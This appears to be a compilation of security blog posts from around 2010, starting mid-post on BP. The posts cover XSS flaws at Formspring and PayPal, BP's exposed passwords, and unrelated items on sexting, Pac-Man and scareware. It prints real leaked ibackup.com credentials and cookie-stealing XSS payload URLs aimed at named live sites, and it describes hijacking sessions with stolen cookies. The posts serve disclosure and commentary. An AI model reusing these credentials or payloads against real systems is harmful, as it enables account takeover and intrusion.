There are two old passwords in two of the files, a form and a newsletter, both are for ibackup.com access which like other document sharing sites has a public folder concept. Given their age, there probably isn’t much of an issue here, however password re-use inside organizations is quite common.

ID: bproadmap
PW: safety
journey_hazard_assessment_card_2009_02_18.pdf

ID: bpshipping02
PW: flag01
Flag_29_May_2008.pdf

In the case of the second id, it certainly looks to be the kind of id and password that gets incremented for different things (bpshipping01, bpshipping03, flag02).

PHP File Include and XSS

Finally, the Reddit commenter points out the energizer.gp.com URL as one that appears to be a web application with a few issues including potentially a PHP remote file include or arbitrary file access:

http://energiser.bp.com/help.php?module=moodle&file=insert file here

The site appears to use Moodle, a popular CMS platform, thus something else that can be looked at. However holisticinfosec got there first and best with an XSS based iFrame injection:

http://energiser.bp.com/login/index.php?lang=%22%3E%3Ciframe%20src=http://www.tampabay.com/multimedi
a/archive/00121/SP_322824_BORC_oilp_121445c.jpg%20width=450%20height=300%20frameborder=0%20scroll=no
%3E%3C/%3E%3C/;document.write%28unescape%28a.source%29%29;{//

iFrame inclusion on a bp.com site.

Finally

Is most of this nonsense from a hard core security standpoint? Yes, to an extent. The XSS ought to be corrected, and dual factor authentication on VPN’s is kind of a must have at this point.

Does BP need a security audit of their perimeter, web properties, online services used, and security policies? Also yes. Maybe schedule it after they plug that gushing oil geyser this August.

Related Posts:

• Newsweek Reports Zombie Invasion
• Congressional Web Site Defacements Follow the State of the Union
• Umm…TechCrunch? Defacement Two in 24 Hours
• TechCrunched – TechCrunch the Victim of a Defacement
• Baidu.com the Latest Victim of Iranian CyberArmy

Formspring.me, a newly popular social networking site, has a fundamental cross site scripting flaw that allows one logged in user to steal another user’s session, but also may allow users to find out who posted a nasty comment about them. A key complaint about the site is that you can not find out the identity of an anonymous user.

Update: Kudos to Formspring.me, even though it was hard to initially report the problem, they corrected it in about an hour from opening a post on their technical support forum, a nice turnaround by any standard.

Formspring.me

Formspring.me is a six month old social networking question and answer site. The web site has come under scrutiny following a few recent news stories involving incidents with teenagers, the site’s primary demographic. The first notable incident was where a fight broke out over comments on the site. More notably, however, is the story of Alexis Pilkington, a 17 year old West Islip, NY High School graduate who committed suicide after dozens of insulting comments had been made to her on the site.

From comments on the site, these are not isolated incidents, and its fairly clear Formspring needs to come up with a better model:

Is it possible for you to delete an account for harrassment if the posts were anonymously posted? I received 18 threats last night that I followed up with a police report to my local PD. I have the police report number, as of yet I have not deleted my account so that if you needed to access it to see the post you could. Please advise.

I need to know how to go about finding out who send a message to my daughter’s account. The message says.. that she would be better off dead.

I would appreciate it if Formspring will work with our local Santa Barbara Police Department and the Santa Barbara Sheriff Department to find the person that was impersonating my daughter.

Such problems have led to various organized boycotts, letters home from school officials, and coverage under the topic of cyber-bullying in a number of news outlets.

The Big Issue People Have

One of the primary complaints about the web site is the anonymity of questioners. Hiding behind the veil of anonymity has allowed, mostly teenagers, to make nasty remarks to each other they would probably not make under their own names (although frankly the Internet is a wild place). Largely as a result of this, a good deal of time has been spent trying to figure out a way to determine: “who said that about me?”. That is at least according to the articles I’ve been reading. Formspring won’t help you with anonymous questions, as it states in their support forums

But here’s an answer to that question, or at least a method: a way to grab another user’s session only knowing user name because of a web site vulnerability present in the Formspring web site.

1. We have two users: Tester21 and Tester25. Since they have such close names, they’ve decided to follow each other using the site’s People->Find People and Follow functions.

2. Tester 25 goes to www.formspring.me and asks Tester21 a question:

   

   Ask another user a question.

   
   

3. But that’s kind of boring, so Tester25 asks a better question:

<script>alert(document.cookie);</script>

4. Tester21 logs in and sees he has a question:

Malicious script, dutifully encoded by Formspring.me.

<a href="#" rel="question">
&lt;script&gt;alert(document.cookie);&lt;/script&gt;</a>
<span class="askedBy">asked by <a href="http://www.formspring.me/tester25" rel="profile">tester25</a>

5. Glad Formspring has protected him from revealing his session cookie by properly encoding output, Tester21 makes a note to drop that loser Tester25 from his Follow list and clicks Home:

The home screen preview executes the Javascript.

What Happened?

A preview function on the home page shows the user the last pending question they’ve received. If its the one that is the cross site scripting string, the script executes. In this case its only the classic alert box demonstration, but anything that can be accomplished with Javascript is possible.

Another Random Issue

It appears formspring.me actually logs users in as someone else sometimes without any interaction, as evidenced by this user complaint:

Hi, everytime i want to go to my home page or feeds on my friends answered questions, i keep going to random people’s homepage or their feeds, anyway i can fix this?

Why is Disclosure this Difficult?

After numerous attempts to sign up for the Support section of the site so we could notify Formspring of this defect, we finally just posted an issue in their Technical Support forum as the notification. They need to think about adding a screen or e-mail address for reporting security issues, ala Twitter and other sites.

Finally

So assuming someone is acting as an anonymous user, but has given more information in their profile (e-mail, etc.) then the person who wants to know who they are could send them a variation of the “poison question” above that steals that user’s session (likely this would involve sending the user’s cookies to another web site, having a script running there that grabs the cookies and perhaps logs in in as that user and changes the user’s password which essentially takes over the account). From taking over the account the attacker gains access to any information filled out in the profile (could be nothing if Anonymous uses dummy information and an anonymous e-mail) and can post and answer questions as that user.

Additionally by searching out people making use of the Formspring widget, you don’t even really need to be a Formspring user yourself to post the XSS string to a Formspring user’s account.

The problem above is magnified in that many users connect their Formspring accounts to Facebook and Twitter (meaning a person who has taken over the account can then post messages to these other two social networking services).

In terms of actual impact, its unclear that user’s would have any truly sensitive information available in their profiles, making information disclosure a low risk (assumes the user didn’t post sensitive information themselves). Birthday and e-mail are probably the only two fields that could be considered user confidential. So the primary issue is session hijacking. Is it a big deal? It probably is not, other social networking sites had similar issues in their first six months of existence, it is just something that should be corrected.

As for Formspring itself, and the issues people are having with anonymous users, this is probably worthy of its own blog post. There are a number of sites that allow anonymous comments to be posted, and the web is famous for snarks and nastiness in online comments. That said, having experienced these problems so publicly, and being a web site that is used primarily by young people, Formspring would be best advised to remove the anonymous question capability to avoid libel, cut down on police investigations, and get itself out of the negative press for a while. Call it the price of being popular.

A special thanks to ethicalhack3r for bouncing some ideas around.

Related Posts:

• F-Secure XSS on Anti-Theft Website
• XSS Flaw on PayPal.com
• Pentagon Web Site Vulnerabilities Identified

It’s becoming a familiar story, an angry parent of a student reports finding inappropriate images, self taken naked pictures and videos, on that student’s cell phone. The images and video were sent to the student by a high school football coach. The mother of the student e-mailed the pictures to the administration of the high school, and the coach was promptly fired in disgrace. But this story has an unusual wrinkle: the student is a 20 year-old at the University of Central Florida, the girlfriend of 32 year-old Mandarin High School football coach Jason Robinson.

Upon finding the pictures, the mother of Jason Robinson’s college age girlfriend fired the images off to the administration at the High School employing this coach. The administration reacted by terminating Robinson, who being within the first three years of his contract there was essentially the equivalent of an “at-will” employee.

The high school principal, Dr. Donna Richardson, fired off the following letter to the coach:

"Effective today you have been reassigned to Bulls Bay for the remainder of this school year. You are 
not to come back onto our campus, and we will make arrangements to get any of your personal 
belongings to you. 

You are also being non-reappointed for the next school year. It is regretful it had to come to this, 
but I believe you understand the situation."

"We hold our teachers to a higher standard. They are in front of our students. They're talking 
with our students. They're teaching our students how to become good characters"

Jason Robinson

So we are left with an ‘at will’ employee, who can be dismissed for any reason, being dismissed for showing a lack of sound judgment and a potential violation of a policy (which for whatever reason couldn’t be located in time to include in the letter). From a legal standpoint, the dismissal may be on solid enough ground.

The incident is problematic on a number of fronts though. As soon as an employing organization begins to pass judgment on the private, non-criminal, non-disallowed by policy, actions of two consenting adults, they open themselves up in an inappropriate role as a moral arbiter over their teachers and staff. The mother’s actions were largely inappropriate in the absence of a crime or high school policy violation regarding relationships between teachers and staff. There has been no indication yet that this relationship started when the girlfriend was a high school student herself. But since you can’t control parents, the high school board, a group of people, owed it to all involved to display a cooler head.

Robinson is claiming this incident has ruined his reputation, and is suing the parents of his 20 year old girlfriend for violating his privacy by looking at the material. It certainly does affect his future prospects in working as a high school football coach to be so publicly dismissed.

A sister of the girlfriend does attend high school at Mandarin also, probably another reason this should have been handled much more quietly, as her life must be a joy right now.

One Wrinkle Though

Dr. Donna Richardson

There is one awkward little wrinkle to the whole episode which may make the school board right (but which throws into question why they wouldn’t comment further to defend their position). There is an allegation that the coach used a school computer to send the images. If that is the case, a policy prohibiting using school equipment to view or send pornography should both be in place and apply (minus the publicity and ’shaming’ e-mail).

So why isn’t that being included in the school’s response to the case? Either because it isn’t true, or because they haven’t conducted a responsible forensics investigation to back up the allegation. To fire someone so publicly without having this was a mistake. Administrative leave, strengthening the case via proper computer forensics, and then having a full story to go forward with is the correct way to go, not an e-mail sent in haste from the principle’s computer.

According to most followup commentary, the “sent from a school computer” piece likely is not true anyway.

Sexting

Basically the act of sending a sexually explicit photograph or message with mobile phones as the communication device. The name derives from a combination (or portmanteau for those who want to learn a new word) of the words sex and texting.

The first well known reference to the word is a 2005 article in the British Sunday Telegraph Magazine. In a survey conducted by Cosmogirl, 20% of teens and 33% of young adults indicated they had sent nude or semi-nude (big difference) pictures of themselves via electronic communications. Some 39% of teens and 59% of young adults had said they sent sexually explicit messages.

The Cosmogirl results have been thrown into question however (surveys always are); at least one sociologist, C.J. Pascoe, an assistant professor at Colorado College, completed a three year study interviewing 80 teenagers and found no evidence of truly explicit text or photographs sent via mobile devices.

From personal experience, students are certainly sending and posting information that their parents and other adults would note is probably a mistake to preserve electronically and share. Campaigns, such as the James Lipton campaign we posted about earlier, Don’t Tweet Your Junk, are largely a reaction to this problem.

So there is an issue here that should not be ignored, one that naturally followed the increasing capabilities of cell phones, the decreasing costs, and the result that more young people than ever have sophisticated access to communications technology (something their parents did not by and large have). That said, hyping the numbers by suggesting that 2 out of every 10 teens are sending naked pictures of themselves via their phones is unnecessarily alarmist.

The other larger problem of overreaction is overzealous prosecution of teenagers under child pornography laws which were certainly not codified to cover teenagers e-mailing photographs to each other. Further, the classification of said teenagers or young adults as sex offenders serves only to weaken the notification requirements under Meghan’s Law, designed to protect youth against real sex predators.

Finally

I don’t understand the proclivity in the number of people sending naked pictures of their junk to other people. Maybe if doing so will result in Paris Hilton like publicity, but for most of us photographing our nether regions should be grounds for having our heads examined. That said, what we have here is two consenting adults sending content between each other. It was no more the high school’s business than it was that of the mother, unless a school computer was used.

One could make the loose case that the Mother of a 20 year-old might have the moral authority to snoop to try to keep her daughter safe (we don’t really think so at 20, but we could see someone saying that). But sending the pictures on to the high school administration rather than handing this as a private family member shows terrible judgment on the mother’s part. But parents can’t be controlled, the school had to realize a story as salacious as this would spawn media coverage, and should have had their act in order before reacting. If they have nothing, no evidence that this relationship started when the girl was underage or in high school, no use of a school computer via evidence gathered in a forensically sound manner, then this school board has made a mistake.

Or as Principal Richardson defined the school’s mission: “They’re teaching our students how to become good characters”. They’re acting like characters all right, so far anyway.

Sources:

• High school coach fired for sexting 20-year-old college girlfriend. Wait, what?
• Mandarin Football Coach Under Fire

Related Posts:

• Press F1 for Help, pwned.
• James Lipton says “Don’t tweet your junk”

Courtesy of security rock star Rik Ferguson comes the below picture of a data room (server room) at the airport in Johannesburg (O.R. Tambo International Airport). Presumably the door sign should read “For Access Call…or Just Walk In”.

On a more serious note, in this age of discomfort surrounding airport security, why does Africa’s largest airport have a door sign viewable from a public area that clearly labels where to find sensitive equipment? Wait, why is the data room accessible from a public area at all? These are questions for airport officials I guess.

They have been notified.

Open Door at the Data Room in the airport at Johannesburg, South Africa.

Remember: self closing doors, man traps, “keep door closed” signs, and caning server administrators who leave doors open are effective deterrents for this kind of behavior.

Related Posts:

• Happy 30th Birthday Pac-Man, Google Style
• Best Information Security Commercial Evah…
• Bo Dietl Lost His Guns

Hat’s off to Google for unveiling perhaps the greatest tribute today to the 30th anniversary of the iconic video game Pac-Man. Google revealed its first “doodle” or temporary logo change back in 1998, with the first animated logo appearing on Newton’s birthday earlier this year. At this rate of increasing complexity, the Google logo should be sentient by 2012.

For the birthdays of one of the most successful video games of all time, Google reveals perhaps its most complex logo of all time, a full featured playable version of the game for the next 48 hours:

Go to google.com, and click the logo or the Insert Coin button.

Hit “Insert Coin” twice and Mrs. Pac-Man will show up too.

Pac-Man

The original 1980 version of Pac-Man.

Pac-Man was first released on May 22nd, 1980, thirty years ago today, by Namco in Japan. According to Guinness, Pac-Man is the most successful coin-operated video game of all time. It sold more than 100,000 units in 1980 and kids pumped more than $1 billion dollars in quarters into the arcade game in its first fifteen months. It was played more then 10 billion times in the first twenty years from its release.

End Game

At level 256, things get messy.

Due to a programming glitch the game ends at level 256, although that’s not much of an issue because few in history have ever gotten a perfect score. Billy Mitchell played the first verified perfect game in 1999. In 2009 David Race became the sixth and currently last person known to achieve a perfect score.

Notice we said ‘verified perfect game’? That’s because in 1982 an 8 year old named Jeffrey Yee allegedly received a congratulatory letter from then President Ronald Reagan congratulating him for the record score of 6,131,940 points. There’s a problem though, that score would only be possible by passing level 256, the famous impassable split-screen bug shown at left.

Pizza & Puck-Man

Toru Iwatani was the primary developer of the game in 1979, and has related the apocryphal story that the main character was designed after looking at a pizza that was missing a slice. In reality the character is a rounding and simplification of the Japanese character for kuchi, or mouth. The original name, pronounced pakku-man, is a take off of the Japanese phrase paku-paku taberu where the words paku-paku describe the sound of a mouth eating.

The game was released under the name Puck-Man, but modified for the game’s North American release to Pac-Man as it was feared that arcade machines would be vandalized by modifying the ‘P’ to an ‘F’.

Those Ghosts

“Google doodler Ryan Germick and I made sure to include Pac-Man’s original game logic, graphics and sounds, bring back ghosts’ individual personalities, and even recreate original bugs from this 1980’s masterpiece,”
- Marcin Wichary, Usability, Google

Original Monster Names.

Blinky, Pinky, Inky, and Clyde are the four ghost monsters, the antagonists of the game. Each has its own personality derived from movement patterns, as derivable from both past efforts to reverse engineer the game as well as the Japanese translations of their original names:

Finally

You can go play Pac-Man a few blocks from Praetorian’s main office down at the Chinatown Fair Video Arcade on Mott Street.

With that we leave you with the 80’s tribute song Pac-Man Fever by Buckner and Garcia in honor of the day. Enjoy.

Related Posts:

• For Access Call, or Walk Right In
• Best Information Security Commercial Evah…
• Bo Dietl Lost His Guns

Say what you will about LIGATT security, the publicly traded (around 0.0004) Georgia company headed by self styled security expert and convicted felon (federal conspiracy and wire fraud) Gregory Evans: they are responsible for what might be the greatest information security commercial ever created.

As you can see, the protagonist is down on his luck, but he has a plan to change that. It starts by sitting outside your house with a laptop while you sleep, and attacking your wireless…well, just watch:

At one point its unclear whether he’s going to crack a WEP key or someone’s head with the way he’s holding that laptop.

And where did that laptop come from in the driveway anyway?

Related Posts:

• For Access Call, or Walk Right In
• Happy 30th Birthday Pac-Man, Google Style
• Bo Dietl Lost His Guns

Richard “Bo” Dietl lost his guns. The former NYPD Detective and media contributor on Fox News and the Don Imus show, founder of Beau Dietl & Associates, subject of a film where he was played by Stephen Baldwin, and Chairman of the New York State Security Guard Advisory Council was featured on Jon Stewart’s show for being himself burglarized. What’s funny is that his description of what happened, particularly his focus on the security measures he had in place but that weren’t used, follow the well worn pattern of responses one typically hears after an information security breach (but we were PCI compliant, we had IDS in place, it was a sophisticated attacker, everyone gets hacked, and so forth).

Back Story

Bo Dietl had his guns (9 handguns and a shotgun) stolen from his 1 Penn Plaza office sometime between November 2007 and last January according to his time frame. He spends time in the clip showing us his office’s four hour safe (fire protection is given in hours), the safe the guns were next to, not in. The shot gun was on top of a bookshelf.

The Daily Show, 04/15/2010

Beau Dietl & Associates

The firm primarily handles personnel and physical security, and has a list of firms, events, and celebrities for which they have provided personal protection.

Unfortunately when Bo starts advising on information security, the wheels fall off the wagon:

Finally

A laugh on a Friday along with two important lessons: the best security measures don’t work when they’re not actually used, and practice what you preach.

Related Posts:

• For Access Call, or Walk Right In
• Happy 30th Birthday Pac-Man, Google Style
• Best Information Security Commercial Evah…

Gal Shpantzer, friend of the blog, fellow blogger, and a writer for CSO Online asked us to bring some attention to a worthy cause. As part of his talk at Security B-Sides Boston in Cambridge, MA, he will partake in certain unabashed activities for each monetary contribution threshold reached for Hackers for Charity.

If the total amount of money raised is $3,000 or more, he will shave his head into a Mohawk.

At the $5,000 level, he says he will wear a kilt. For this second one, we’re not sure how doing something he likes to do anyway is a personal challenge, but whatever.

The Specifics

To donate via PayPal, start at the following address: http://www.hackersforcharity.org/hackers-for-charity/get-involved/#Long_Journey.

When you receive a receipt from PayPal for the donation amount, please e-mail the relevant portions to: mohawk@security-twits.com. If the above thresholds are reached by April 24th, Gal Shpantzer will really need that hat he’s always pictured in wherever he goes.

About Hackers for Charity

Hackers for Charity is a non-profit organization created by Johnny Long. The overall goals of Hacking for Charity are listed as follows:

• We feed children through our “food for work” program
• We build computer labs to help students learn skills and land jobs that are key to disrupting poverty’s vicious cycle.
• We provide technical assistance to charities that can not afford IT services.

The Jinja, Uganda community center.

A center was recently opened under the initiative in Jinja, Uganda in East Africa. The goal of the center is to provide hands on computer training to a community that will soon reap the benefits of high speed fiber lines such as the ones running from Mombasa. In order to realize job creation in these areas, people who have never before touched a computer require hands on experience, experience that can be gained using the free training resources and heavily discounted computer usage fees available at the new center.

You can read the rest of what is an interesting progression, see which firms have supported the training initiative, and even read the story of one condescending company that wouldn’t help here.

Johnny Long

Johnny Long is a security researcher best known for popularizing Google hacking, using search phrases in the popular search engine to identify vulnerable services on the Internet and for being as he’s described it, a “Christian hacker”. He’s published a book on the Google hacking techniques, and contributed to more than ten other works in information security literature.

Finally

We at Praetorian also think Gal should die the mohawk one color and the rest of his hair another.

Related Posts:

• Zuckerburg Apologizes for Facebook Privacy Changes
• James Lipton says “Don’t tweet your junk”
• LoJack for children
• Yahoo! and the Objectification of Women

Earlier today Wesley Kerfoot reported on the Full Disclosure mailing list that a page in the Paypal.com domain is susceptible to a non-persistent reflected cross site scripting attack (XSS). While non-persistent XSS bugs are somewhat common, this is quite serious for a site like PayPal, where user accounts are linked directly to bank accounts, debit, or credit cards and payment can be made to third parties without any additional authentication after user access is gained.

Update: As of 7pm EST, it appears that a mitigation has been implemented for this vulnerability on the PayPal web site where all requests to /xclick/business redirect to the PayPal homepage.

An attacker able to trick a user with a valid Paypal session into clicking a crafted version of the link below (wouldn’t be hard, think a link on an eBay auction listing or a phishing e-mail for example) could hijack the user’s session and initiate financial transactions on their behalf including money transfers. Alternatively this legitimate URL could be used to redirect the user to a spoofed PayPal web site designed to steal user credentials, which is a fairly common scam except in this case more effective as the user would see an actual PayPal URL to click on.

Attack String

The following string is provided as example in the Full Disclosure posting:

https://www.paypal.com/xclick/business=<script> alert("xss"); </script>

Which in turn results in this:

Javascript injected as part of a name-value pair is reflected on the resulting web page.

Of course where this works, this will just as easily work:

https://www.paypal.com/xclick/business=<script> alert(document.cookie); </script>

Which dutifully reflects back wrapped in a header tag on the resulting page:

<div class="legacyErrors " id="page">
<div id="header"><h1><script> alert(document.cookie); </script></h1></div>
<hr>
<div id="content">
<div id="headline">

And finally which displays the user’s logged in session information:

The result of injecting alert(document.cookie) into the same page for a logged in PayPal user.

Rather then displaying the cookies, the attacker would redirect the information to another web site, set them locally as his session, and begin to initiate transactions on the part of the user. This is only one example, since Javascript can be executed in the context of the PayPal web site, the attacker could write a script to do just about any action on the site that is possible using Javascript, Flash, etc.. Site redirects, iFrame injection, and even other injection flaws are possible on a web page that does not validate untrusted input.

XSS at a High Level

While the definition is ever expanding, XSS attacks are generally considered a type of injection problem where malicious input is injected into an otherwise trusted web page causing an unexpected behavior such as sending data to or from an unknown third party web site (cross site). Because the script is being run in the context of the trusted web site, it has access to cookies such as session tokens, as well as any other user information available within the security context of that web site. XSS vulnerabilities are somewhat common in web applications and will occur unfettered wherever untrusted input is not validated by the web application or encoded before output back to the user.

PayPal

The San Jose based company is owned by eBay and has more than 78 million customer accounts. As such the service is used to clear many of the transactions on the popular auction site. The service allows users to send money without needing to share financial information, a key enabler for sending and receiving money from third parties on the Internet. They are in some 190 markets around the world and can work with 19 different currencies.

In 2008 roughly $60 billion dollars moved through Paypal’s systems.

Paypal does make available additional authentication protection in the form of a one time password token called a ’security key’ by them (similar to the ones made popular by RSA). The token costs five dollars and is available to residents of Australia, Germany, Canada, the United Kingdom and the United States. Paypal however allows a bypass of this hard token by allowing the user to enter further information such as credit card or bank number, severely impacting its effectiveness as a security measure.

Further authentication “on the front door” of the web site (the login screen) does not prevent a user session from being hijacked after authentication as is possible in a cross site scripting attack like this one.

PCI Compliance

Of note is that PayPal does claim PCI compliance, involving the following activities in their words:

• Maintain a vulnerability management program
• Pass quarterly remove vulnerability scans

The wording on that second bullet from the PayPal site is a little strange, we assume it means to pass vulnerability scans that validate whether earlier problems identified by previous scans were removed.

The attack string above is basic enough that it would or should be tested and picked up as a vulnerability by the most rudimentary web scanners available, throwing the validity of any scanning being done into question. Actual credit card data is displayed in an obfusticated manner on the Profile section of the web site (only the last four digits show up on the site), so the site may be considered out of scope of a PCI required scan?

The digital certificate of the scanalert.com URL, a redirect to the McAfee service PayPal provides to its business customers at no cost for a year, has a bad digital certificate.

Finally

Generally users can apply for refunds from PayPal when an account has been broken into, but like any other service there are a share of horror stories. In general a site such as this should escape all output that originates from untrusted sources, with the variety of possible attack strings this is not full proof but is a significant mitigation against injection attacks. This is not PayPal’s first brush with this problem, last year a similar issue was identified by Harry Sintonen. As PayPal is, for many users of eBay and other online services, the only payment game in town (the only one which a seller will use to collect payment) this type of issue needs to be corrected fairly quickly in a comprehensive manner (a site wide change to introduce web vulnerability scanning, escape all user provided input when outputted, and/or validation of all user provided input ideally).

References

• Full Disclosure – Paypal XSS Vulnerability

Related Posts:

• F-Secure XSS on Anti-Theft Website
• Formspring.me XSS Vulnerability
• Pentagon Web Site Vulnerabilities Identified

Refusing to maintain and follow a good termination checklist that walks through what access rights to decommission when someone leaves your company can put the brakes on your customers’ good will. Texas Auto Center in Austin Texas demonstrated the headaches that ensue when in February they left more than 80 customers who financed cars unable to get to school, work, and stuck with charges for towing and unnecessary repair work.

Originally diagnosed as mechanical failures in the cars, the problems stopped as soon as all the passwords for the WebTeckPlus system used by the firm were reset. A recently terminated employee, twenty year old Omar Ramos-Lopez, had used still active credentials to login to the web administration portal of the Auto Center’s payment incentive vendor and used it to disable vehicle starters or, according to police reports, have horns honk through the night.

In the case of Ramos, Texas Auto Center is claiming that his account was terminated when he was a part of a reduction in force last month, but that he used another employee’s account to access the system. Once in he began perusing the database of 1,100 Texas Auto Center customers with the device installed, first targeting specific customers but then going down the list corrupting records, setting off car horns, and disabling cars. When police obtained access logs from the vendor, Pay Technologies LLC, the Internet Protocol address of Ramos-Lopez’s AT&T Internet service showed up.

The Texas Auto Mall in Austin, TX.

Payment Incentive Systems

The types of systems used to remotely disable the vehicles are largely designed to replace physical repossessions at so called subprime auto dealers. What started as somewhat clunky keypads that required vehicle operators to punch in five digit codes to get a vehicle to start, a code given to them when their car payment was made, has moved to more sophisticated remote technology. Devices such as these have been around for a little more than 15 years now. Their functionality falls into two categories, solutions that render the vehicle inoperative and those that allow for electronically locating the vehicle (GPS) for repossession.

The vendor in this case, Pay Technologies LLC in Cleveland, offers such services under the labels WebTeck and PayTeck GPS. Their model allows auto dealers to install a small device, a small black box, under the car’s dashboard. The device responds to commands relayed over a wireless pager network, commands that are sent via a web based dashboard maintained by Pay Technologies. Commands such as honking the car horn or disabling the car’s ignition are examples of what dealers are able to do. Note that a running car cannot be cut off however, for obvious safety reasons.

Proponents of these payment incentive systems state that without them, persons with severely damaged credit would not be able to finance the same type of car they are able to purchase with the assurances provided by these devices. In a 2005 article, one dealer is quoted as stating that his repossessions dropped from 45% to 15% and allowed him to make car sales to buyers who would normally be shut out of financing options.

Still, the devices make people uncomfortable. There is the threat of being stranded, although dealers are advised to only cut off starters early in the morning, to avoid that happening. Further there is the question about what happens in an emergency. In the case of Pay Technologies, a 24 hour grace period can be enabled, allowing the car to start, in the case of such emergency. Finally, the GPS tracking raises privacy concerns.

Despite these issues, court challenges to the devices have largely been unsuccessful when proper disclosure of the devices installation is made. In a 1999 filing against Mel Farr, a football HOF member and Detroit car auto dealer, a handful of customers sought to have the devices removed for being dangerous. The court sided with Farr.

Information Security Considerations

Looking at this from an information security perspective, a couple of problems come to light. First, while Ramos-Lopez’s account was disabled, where the dealership was aware that password sharing was going on, and that a reduction in force was taking place, the whole episode would have been avoided with a company-wide password reset following the terminations. That and working towards eliminating password sharing (prevent multiple logins from different IP’s, report on strange login activity) is a good practice.

On a more general note, in order to be effective, a good access management practice has a number of characteristics. Chief among these are that access rights should be reviewed in conjunction with business managers at some regular interval (quarterly or monthly, depending on your risk disposition), anytime someone undergoes a significant role transfer within a firm, and most importantly when someone leaves a firm. The management overhead of this process is made easier when the raw number of password authentication systems is limited through enabling technologies such as central authentication/authorization services or single sign on. To put it simply, users must track and protect less passwords, less passwords need to be changed in response to business events, and access control rights are easier to review when some consistency exists between installed applications across an enterprise.

Also

Perhaps a second relevant question for the information security community is why attacks on these systems haven’t happened more often. Crackers, despite reports that they have all moved to an all economic incentive approach, still perform acts of mischief. The web site administration for this system, a system that can be used to disable automobiles, is protected by a simple password authentication that is open to brute force attack. The answer may simply be that the existence of this technology and how it worked was not well known. As Pay Technologies CEO Jim Krueger noted, this is the first time this technology has been abused. Now that its existence is more public, one can wager that it won’t be the last.

Also, Ramos-Lopez didn’t ‘hack’ anything.

References

• Hacker Disables More Than 100 Cars Remotely
• Texas Auto Center
• Pay Technologies
• High-tech ‘repo man’ keeps car payments coming

Related Posts:

The agitation in the voice on the phone shook me from sleep early Saturday morning: My Uncle the surgeon had a computer problem and he was concerned enough to call. He explained he had been trying to view pictures of a newly renovated base in South Korea when all of a sudden McAfee popped up and did a scan, revealing 28 viruses. But for some reason the new module McAfee wanted him to install wasn’t working because the site wouldn’t accept either of his credit card numbers.

Most security professionals don’t need any further information to know what happened and that it wasn’t the McAfee installation firing these apparent anti-virus (AV) alerts. Instead this was a web dialogue with animations masquerading as the Windows My Computer screen and an AV dialogue. Accepting the download lead to a malicious software installation and payment screen, a scam commonly referred to as scareware. Scareware is software sold or downloaded by creating a perception of a threat to the user, playing off that user’s fear and anxiety of viruses and spyware infecting his or her computer.The real McAfee estimates that worldwide scareware scams have raked in profits of more than $300 million annually, with a meteoric growth rate of 660% for infections over the past two years. The number of scareware product variants was about 142 in 2004, there have been 110 new variants tracked in just the first two months of 2010.

The software, originally spread through classic methods such as spam, has moved on to more sophisticated attacks by providing links to infected web sites through popular social media content such as Twitter, YouTube, and Facebook, by feeding a corrupted advertisement into an ad network for web sites, and by poisoning search results called Search Engine Optimization (SEO) poisoning.

This last attack, SEO poisoning, was what infected my Uncle: a web search was poisoned with results from compromised legitimate web sites. By creating content with popular terms and linking back to it from legitimate ranked sites, the rules search engines like Google use to prioritize results are subverted. The video below demonstrates the effect with search results that showed up the first page of Google results shortly after the earthquake in Haiti:

This rogue anti-virus/spyware software is distributed through a complex network involving around fifty known companies at the top building and distributing software to affiliates who earn rewards for successful sales. The companies at the top of this scheme operate at times with such impunity that their executives are bold enough to have professional profiles on the business networking site LinkedIn.

In October of 2008 one of these networks was mapped out when a hacker named Neon broke into a computer housing accounting information for a Russian company called Bakasoftware. This company provided access to solicited affiliates through an online control panel providing varied methods of infecting computers. Affiliates could earn from 58% to 90% commission on sales of the rogue software.

The Lexus Contest.

At times creative bonuses are involved: one contest by a site called TrafficConverter.Biz offered a $36,000 Lexus to the top affiliate. In 2008, the top five affiliates in the Russian Baka Software Gang averaged weekly commissions of $107,604 according to documentation found by researcher Joe Stewart. When the Federal Trade Commission obtained a court order to stop Belize’s Innovative Marketing from selling rogue software, the firm had made approximately $180 million dollars in a year through four million customers who purchased the software thinking it was real. There is probably no better metaphor though than the high end Mercedes sedan once displayed on scam web site iframeCASH.biz, known to be similar to the model driven by its founder and scareware pioneer, St. Petersburg’s Andrej Sporaw.

iFrame Cash.

My Uncle was mildly embarrassed by the entire episode, but should not be, because the techniques used to propagate these scams have become so advanced that the educated and computer savvy among us are not immune. The software replicated the logos, the look and feel of the anti-virus he knew he had installed. The sophistication of these schemes has risen alongside the profit available to be made. He was under the impression of many Internet users: as long as he had his anti-virus software installed, kept Windows updated, didn’t open strange e-mails, and stayed away from strange web sites he would be safe using the Internet. When legitimate web sites are compromised with scripts launching fake AV dialogues, these rules do not apply. Such methods have led to an estimated one million victims of scareware per day worldwide.

Fortunately in my Uncle’s case he was able to cancel the credit cards involved and clean up the PC before experiencing any problems. Others have had their PC’s hijacked with the rogue software preventing updates to legitimate software, locking up the PC, preventing un-installation, installing malware, and generating a constant stream of pop ups in the web browser.

How do you avoid the scam? Remember that no legitimate anti-virus company will perform an unsolicited scan of your computer and ask for payment to correct issues identified. Close out of the browser when you see such a dialog come up. Run scans with your legitimate anti-virus and anti-spyware solutions on your PC (remember though that these installations are designed to work around anti-virus before you get too frustrated). Finally consult with a colleague who has experience in dealing with information security problems.

Information technology folks are usually willing to help, they know that when you work in technology you will always be your own family’s private help desk, a little like how the family doctor is always stuck giving everyone medical advice.

Related Posts:

• Scareware Purveyors, Spammers, and Crooks Take Advantage of Haiti Earthquake

The announcement came out earlier today that SecurityFocus, a long standing security news portal started in 1999 and home of a number of popular mailing lists including the well known Bugtraq is being shuttered by Symantec. While aspects of the site will continue (the mailing lists will remain and some content will be moved to Symantec Connect), the loss of the news portal and site itself is a significant loss of historical perspective on the information security industry from what was a long standing news and research source.

From the announcement:

Beginning March 15, 2010 SecurityFocus will begin a transition of its content to Symantec Connect. As part of its continued commitment to the community, all of SecurityFocus’ mailing lists including Bugtraq and its Vulnerability Database will remain online at www.securityfocus.com There will not be any changes to any of the list charters or policies and the same teams who have moderated list traffic will continue to do so. The vulnerability database will continue to be updated and made available as it is currently. DeepSight and other security intelligence related offerings will remain unchanged while Infocus articles, whitepapers, and other SecurityFocus content will be available off of the main Symantec website in the coming months.
From: Change in Focus

SecurityFocus

The SecurityFocus web site before the shift.

SecurityFocus.com kicked off as an online computer security news source in 1999, founded by a couple of parties (Arthur Wong, Al Huger, Elias Levy, et al.). In the summer of 1999 the Bugtraq mail list was subsumed into SecurityFocus. In 2002 the site was acquired by Symantec, the well known anti-virus vendor, for around $75 million in cash.

Bugtraq

